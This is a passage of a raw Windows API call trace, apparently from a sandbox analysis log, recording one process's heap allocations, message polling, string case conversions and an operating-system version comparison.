lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0268.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.441] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0268.442] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0268.442] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.442] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0268.442] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0268.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0268.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0268.443] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0268.443] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.443] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0268.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0268.444] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.444] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.445] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.446] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0268.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.447] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0268.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0268.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0268.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0268.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.450] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.450] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.450] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0268.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.451] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0268.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0268.451] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0268.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0268.451] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0268.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0268.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0268.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0268.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0268.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0268.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0268.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0268.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0268.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0268.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0268.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0268.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0268.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0268.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0268.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0268.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0268.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0268.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0268.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0268.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0268.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0268.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0268.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0268.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 